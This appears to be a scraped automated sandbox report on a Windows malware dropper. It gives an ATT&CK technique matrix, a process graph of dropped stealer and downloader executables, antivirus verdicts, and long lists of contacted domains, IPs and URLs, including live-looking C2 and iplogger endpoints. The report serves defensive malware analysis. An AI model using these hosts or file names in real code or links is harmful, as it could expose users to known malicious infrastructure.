Default AccountsCommand and Scripting Interpreter3Application Shimming1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture31File and Directory Discovery4Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Create Account1Application Shimming1Obfuscated Files or Information3Security Account ManagerSystem Information Discovery57SMB/Windows Admin SharesInput Capture31Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts2Valid Accounts2Install Root Certificate1NTDSQuery Registry2Distributed Component Object ModelClipboard Data2Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronBootkit1Access Token Manipulation21Software Packing24LSA SecretsSecurity Software Discovery271SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonProcess Injection12Timestomp1Cached Domain CredentialsVirtualization/Sandbox Evasion4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncProcess Discovery4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading2Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts2/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Modify Registry1Network SniffingSystem Network Configuration Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion4Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdAccess Token Manipulation21KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskProcess Injection12GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
Trusted RelationshipPythonHypervisorProcess InjectionBootkit1Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 324174 Sample: KeJ7Cl7flZ.exe Startdate: 28/11/2020 Architecture: WINDOWS Score: 100 54 www.evograph.ro 2->54 56 jojo-soft.xyz 2->56 58 7 other IPs or domains 2->58 64 Multi AV Scanner detection for domain / URL 2->64 66 Antivirus detection for dropped file 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 10 other signatures 2->70 9 KeJ7Cl7flZ.exe 18 2->9         started        signatures3 process4 file5 34 C:\Users\user\AppData\...\ubisoftpro.exe, PE32 9->34 dropped 36 C:\Users\user\AppData\Local\...\hjjgaa.exe, PE32 9->36 dropped 38 C:\Users\user\AppData\Local\...\file1.exe, PE32 9->38 dropped 40 6 other malicious files 9->40 dropped 12 jg2_2qua.exe 7 9->12         started        17 Setup.exe 1 26 9->17         started        19 002.exe 2 4 9->19         started        process6 dnsIp7 60 101.36.107.74, 49732, 80 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK China 12->60 62 iplogger.org 88.99.66.31, 443, 49733, 49737 HETZNER-ASDE Germany 12->62 42 C:\Users\user\Documents\...\jg2_2qua.exe, MS-DOS 12->42 dropped 74 Antivirus detection for dropped file 12->74 76 Detected unpacking (changes PE section rights) 12->76 78 Drops PE files to the document folder of the user 12->78 80 Tries to harvest and steal browser information (history, passwords, etc) 12->80 44 C:\Users\user\AppData\Local\...\setup.exe, PE32 17->44 dropped 46 C:\Users\user\AppData\Local\...\SibClr.dll, PE32 17->46 dropped 48 C:\Users\user\AppData\Local\...\Sibuia.dll, PE32 17->48 dropped 50 C:\ProgramData\sib\...\SibClr.dll, PE32 17->50 dropped 82 Machine Learning detection for dropped file 17->82 21 setup.exe 5 17->21         started        25 WerFault.exe 23 9 19->25         started        27 WerFault.exe 2 9 19->27         started        file8 signatures9 process10 file11 32 C:\Program Files (x86)\...\aliens.exe, PE32 21->32 dropped 72 Antivirus detection for dropped file 21->72 29 aliens.exe 1 21->29         started        signatures12 process13 file14 52 C:\Users\user\...\85F91A36E275562F.exe, PE32 29->52 dropped

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
KeJ7Cl7flZ.exe67%VirustotalBrowse
KeJ7Cl7flZ.exe79%ReversingLabsWin32.Downloader.Upatre
KeJ7Cl7flZ.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe100%AviraHEUR/AGEN.1139239
C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe100%AviraTR/Siggen.lhhpy
C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe100%AviraTR/Crypt.CFI.Gen
C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe100%AviraTR/Crypt.CFI.Gen
C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe100%AviraHEUR/AGEN.1134829
C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe100%AviraTR/AD.PredatorThief.gldkk
C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe100%AviraTR/AD.JamkeeDldr.gwmgy
C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe100%AviraTR/AD.ColtyStealer.mwfxd
C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe100%AviraHEUR/AGEN.1138531
C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exe100%AviraTR/Kryptik.ijozo
C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe100%Joe Sandbox ML
C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exe100%Joe Sandbox ML
C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe100%Joe Sandbox ML
C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
15.2.Setup.exe.400000.0.unpack100%AviraHEUR/AGEN.1139321Download File
19.2.aliens.exe.2f00000.4.unpack100%AviraTR/Patched.Ren.GenDownload File
26.0.jg2_2qua.exe.400000.0.unpack100%AviraTR/Crypt.CFI.GenDownload File
15.0.Setup.exe.400000.0.unpack100%AviraHEUR/AGEN.1139321Download File
1.2.002.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
jojo-soft.xyz9%VirustotalBrowse
evograph.ro7%VirustotalBrowse
trueaerned.com1%VirustotalBrowse
7553014bd6a4211b.xyz5%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://101.36.107.74/seemorebty/il.php?e=jg2_2qua0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://www.ipcode.pw/0%Avira URL Cloudsafe
http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r0%Avira URL Cloudsafe
http://ffdownload.online/business/receiveConnection:0%Avira URL Cloudsafe
http://103.91.21Facebook0%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
https://www.airbnb.cn/account-settingstext/html0%Avira URL Cloudsafe
http://www.ipcode.pw/0.0.0.0CNpathSOFTWARE0%Avira URL Cloudsafe
http://crl.como0%Avira URL Cloudsafe
https://sectigo.com/CPS0B0%Avira URL Cloudsafe
http://7553014BD6A4211B.xyz/info/w0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSADomainValidationSec0%Avira URL Cloudsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
http://7553014BD6A4211B.xyz/ng0%Avira URL Cloudsafe
http://7553014BD6A4211B.xyz/0%Avira URL Cloudsafe
http://101.36.107.74/seemorebty/0%Avira URL Cloudsafe
http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#0%Avira URL Cloudsafe
http://ocsp.pki.goog/GTSGIAG300%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
http://crl.pki.goog/GTSGIAG3.crl00%Avira URL Cloudsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://101.36.10https://www.instH0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://crl.comoZ0%Avira URL Cloudsafe
http://ffdownload.online/business/receive0%Avira URL Cloudsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
http://crl.comoU0%Avira URL Cloudsafe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
https://www.airbnb.cn/account-settings0%Avira URL Cloudsafe
http://7553014BD6A4211B.xyz/L0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://7553014bd6a4211b.xyz/00%Avira URL Cloudsafe
http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSADomainValidationSec)0%Avira URL Cloudsafe
http://www.zxfc.pw/Home/Index/sksxz?uid=3a1c3033bf5a5764882caec7a4cf3849e7de2ef2a8d79cece23467f1d8870%Avira URL Cloudsafe
http://www.fddnice.pw/0%Avira URL Cloudsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://Ojyehq4jg.2ihsfa.com/0%Avira URL Cloudsafe
http://pki.goog/gsr2/GTSGIAG3.crt0)0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
jojo-soft.xyz
104.31.72.130
truetrueunknown
iplogger.org
88.99.66.31
truefalse
    		high
    ip-api.com
    		208.95.112.1
    		truefalse
      		high
      evograph.ro
      		89.40.17.17
      		truefalseunknown
      trueaerned.com
      		198.98.57.54
      		truefalseunknown
      7553014bd6a4211b.xyz
      		172.67.157.133
      		truefalseunknown
      p421ls.xyz
      		104.31.90.245
      		truefalse
        		unknown
        g.msn.com
        		unknown
        		unknownfalse
          		high
          www.evograph.ro
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://101.36.107.74/seemorebty/il.php?e=jg2_2quafalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatejg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpfalse
              		high
              https://iplogger.org/1KyTy7askinstall21.exefalse
                		high
                http://ocsp.sectigo.com0Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                  		high
                  http://www.ipcode.pw/askinstall21.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0rhjjgaa.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ffdownload.online/business/receiveConnection:002.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://103.91.21Facebookubisoftpro.exefalse
                  • Avira URL Cloud: safe
                  		low
                  https://deff.nelreports.net/api/report?cat=msnjg2_2qua.exe, 0000001A.00000003.489902919.0000000003E08000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://iplogger.org/1XJq97askinstall21.exefalse
                    		high
                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://www.airbnb.cn/account-settingstext/htmlubisoftpro.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.ipcode.pw/0.0.0.0CNpathSOFTWAREaskinstall21.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://iplogger.org/1T79i7askinstall21.exefalse
                      		high
                      http://crl.comojg2_2qua.exe, 0000001A.00000003.481303695.0000000000726000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://iplogger.org/1Uts87askinstall21.exefalse
                        		high
                        https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96ejg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                          		high
                          https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                            		high
                            http://charlesproxy.com/sslaliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508666439.0000000000BCF000.00000004.00000020.sdmpfalse
                              		high
                              http://crl.thawte.com/ThawteTimestampingCA.crl085F91A36E275562F.exe.19.drfalse
                                		high
                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                  		high
                                  https://iplogger.org/1OhAGaskinstall21.exefalse
                                    		high
                                    https://iplogger.org/1uVkt7askinstall21.exefalse
                                      		high
                                      https://sectigo.com/CPS0Bhjjgaa.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.msn.com/?ocid=iehpjg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                        		high
                                        https://iplogger.org/1b4887askinstall21.exefalse
                                          		high
                                          http://7553014BD6A4211B.xyz/info/waliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crt.sectigo.com/SectigoRSADomainValidationSecjg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://iplogger.org/1OZVHaskinstall21.exefalse
                                            		high
                                            https://sectigo.com/CPS0DSetup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://iplogger.org/1UpU57askinstall21.exefalse
                                              		high
                                              http://7553014BD6A4211B.xyz/ngaliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://iplogger.org/1O2BHaskinstall21.exefalse
                                                		high
                                                https://iplogger.org/1XKq97askinstall21.exefalse
                                                  		high
                                                  https://iplogger.org/1TT4a7John_Ship.urlfalse
                                                    		high
                                                    https://iplogger.org/1XSq97askinstall21.exefalse
                                                      		high
                                                      http://7553014BD6A4211B.xyz/aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://101.36.107.74/seemorebty/jg2_2qua.exe, 0000001A.00000002.504458828.00000000004F4000.00000040.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#hjjgaa.exefalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://ocsp.pki.goog/GTSGIAG30jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://charlesproxy.com/ssl1aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmpfalse
                                                        		high
                                                        https://iplogger.org/19iM77askinstall21.exefalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://iplogger.org/1T89i7askinstall21.exefalse
                                                            		high
                                                            https://iplogger.org/16ajh7askinstall21.exefalse
                                                              		high
                                                              https://iplogger.org/2WS9q6ubisoftplushttps://iplogger.org/2WF9q6ubisoftsmphttps://iplogger.org/2WJ9ubisoftpro.exefalse
                                                                		high
                                                                https://sectigo.com/CPS0Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp, SibClr.dll.15.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://ip-api.com/json/countryCodecountry_codemac%s.exeSoftwarehjjgaa.exefalse
                                                                  		high
                                                                  http://crl.pki.goog/GTSGIAG3.crl0jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://iplogger.org/16xjh7askinstall21.exefalse
                                                                    		high
                                                                    http://ocsp.thawte.com085F91A36E275562F.exe.19.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cjg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://iplogger.org/1X8M97askinstall21.exefalse
                                                                        		high
                                                                        https://iplogger.org/2WX9q6ubisoftmorehttps://iplogger.org/2WN9q6ubisoftablehttps://iplogger.org/2W6ubisoftpro.exefalse
                                                                          		high
                                                                          https://iplogger.org/ZdnY7jg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmp, jg2_2qua.exe, 0000001A.00000003.480069462.0000000000724000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://101.36.10https://www.instHjg2_2qua.exe, 0000001A.00000002.503990767.0000000000401000.00000040.00020000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		low
                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sSetup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://crl.comoZjg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://iplogger.org/1TW3i7askinstall21.exefalse
                                                                                		high
                                                                                https://iplogger.org/1q6Jt7askinstall21.exefalse
                                                                                  		high
                                                                                  http://7553014bd6a4211b.xyz/info/waliens.exe, 00000013.00000002.508492865.0000000000B96000.00000004.00000020.sdmp, aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                                                                    		unknown
                                                                                    http://ffdownload.online/business/receive002.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://nsis.sf.net/NSIS_ErrorErrorSetup.exe, 0000000F.00000000.288312686.0000000000409000.00000002.00020000.sdmp, Setup.exe.0.drfalse
                                                                                      		high
                                                                                      https://contextual.media.net/jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://ocsp.pki.goog/gsr202jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookiejg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://pki.goog/repository/0jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://crl.comoUjg2_2qua.exe, 0000001A.00000003.480992334.000000000071B000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtjg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://iplogger.org/1OXFGaskinstall21.exefalse
                                                                                            		high
                                                                                            https://iplogger.org/1Ka7t7askinstall21.exefalse
                                                                                              		high
                                                                                              http://www.msn.com/jg2_2qua.exe, 0000001A.00000003.502245420.0000000004088000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://iplogger.org/1bV787askinstall21.exefalse
                                                                                                  		high
                                                                                                  http://www.msn.com/de-ch/?ocid=iehpjg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tSetup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gjg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://iplogger.org/1lC5gaskinstall21.exefalse
                                                                                                        		high
                                                                                                        https://www.airbnb.cn/account-settingsubisoftpro.exefalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://7553014BD6A4211B.xyz/Laliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Setup.exe, 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp, SibClr.dll.15.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://7553014bd6a4211b.xyz/0aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1jg2_2qua.exe, 0000001A.00000003.492557880.0000000003E20000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svgjg2_2qua.exe, 0000001A.00000003.493765388.0000000003F30000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://crt.sectigo.com/SectigoRSADomainValidationSec)jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://www.winimage.com/zLibDllubisoftpro.exefalse
                                                                                                            		high
                                                                                                            http://www.zxfc.pw/Home/Index/sksxz?uid=3a1c3033bf5a5764882caec7a4cf3849e7de2ef2a8d79cece23467f1d887askinstall21.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.fddnice.pw/askinstall21.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://crl.pki.goog/gsr2/gsr2.crl0?jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://Ojyehq4jg.2ihsfa.com/hjjgaa.exefalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://pki.goog/gsr2/GTSGIAG3.crt0)jg2_2qua.exe, 0000001A.00000003.495023797.0000000003E31000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://iplogger.org/1yXwr7askinstall21.exefalse
                                                                                                              		high

                                                                                                              Contacted IPs

